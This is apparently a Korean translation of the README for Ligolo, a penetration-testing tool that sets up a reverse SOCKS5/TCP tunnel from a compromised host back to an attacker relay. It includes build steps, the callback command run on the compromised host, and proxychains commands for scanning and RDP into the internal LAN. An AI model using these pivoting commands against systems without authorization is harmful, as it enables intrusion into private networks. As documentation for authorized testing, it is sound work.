
리버스 터널링, 침투 테스터를 위해 침투 테스터가 만든 간편한 도구 https://sysdream.com/

Ligolo는 역방향 연결에서 SOCKS5 또는 TCP 터널을 완전한 안전성(타원 곡선 TLS 인증서)으로 설정하기 위한 간단하고 가벼운 도구입니다.
이는 Autoroute + Socks4a를 사용하는 Meterpreter와 비슷하지만, 더 안정적이고 빠릅니다.
외부 감사 중 Windows / Linux / Mac 서버를 침투했습니다. 이 서버는 LAN 네트워크 내부에 있으며, 이 네트워크의 다른 머신에 연결을 설정하려고 합니다.
Ligolo는 내부 서버의 리소스에 접근할 수 있는 터널을 설정할 수 있습니다.
Proxychains를 사용한 RDP 연결 릴레이 (WAN).

다음은 두 대의 100mb/s 호스트(ligolo / localrelay) 간 속도 테스트 스크린샷입니다. 성능은 시스템 및 네트워크 구성에 따라 다를 수 있습니다.

Go가 설치되어 있고 작동 중인지 확인하십시오.
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
make certs TLS_HOST=example.com
참고: build를 호출할 때 TLS_CERT make 옵션을 사용하여 자체 인증서를 사용할 수도 있습니다. 예: make build-all TLS_CERT=certs/mycert.pem.
make build-all
make build
Ligolo는 두 개의 모듈로 구성됩니다:
Localrelay는 제어 서버(공격자 서버)에서 실행하도록 설계되었습니다.
Ligolo는 대상 컴퓨터에서 실행할 프로그램입니다.
localrelay의 경우 기본 옵션을 그대로 사용할 수 있습니다. 모든 인터페이스의 포트 5555에서 수신 대기하며 ligolo의 연결을 기다립니다(-relayserver 매개변수).
ligolo의 경우 -relayserver ip:port 매개변수를 사용하여 릴레이 서버(또는 공격 서버)의 IP 주소를 지정해야 합니다.
도움말을 보려면 -h 옵션을 사용하십시오.
Ligolo와 LocalRelay 간의 연결이 설정되면 릴레이 서버의 TCP 포트 1080에 SOCKS5 프록시가 설정됩니다(-localserver 옵션을 사용하여 TCP 주소/포트를 변경할 수 있습니다).
그런 다음 원하는 도구(예: Proxychains)를 사용하여 클라이언트의 LAN 네트워크를 탐색하기만 하면 됩니다.
공격 서버에서:
./bin/localrelay_linux_amd64
침투한 호스트에서:
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555
연결이 설정되면 ProxyChains 구성 파일(공격 서버)에 다음 매개변수를 설정합니다:
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
성공.
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123
Localrelay 옵션:
Usage of localrelay:
-certfile string
The TLS server certificate (default "certs/server.crt")
-keyfile string
The TLS server key (default "certs/server.key")
-localserver string
The local server address (your proxychains parameter) (default "127.0.0.1:1080")
-relayserver string
The relay server listening address (the connect-back address) (default "0.0.0.0:5555")
Ligolo 옵션:
Usage of ligolo:
-autorestart
Attempt to reconnect in case of an exception
-relayserver string
The relay server (the connect-back address) (default "127.0.0.1:5555")
-skipverify
Skip TLS certificate pinning verification
-targetserver string
The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server
GNU General Public License v3.0 (LICENSING 참조).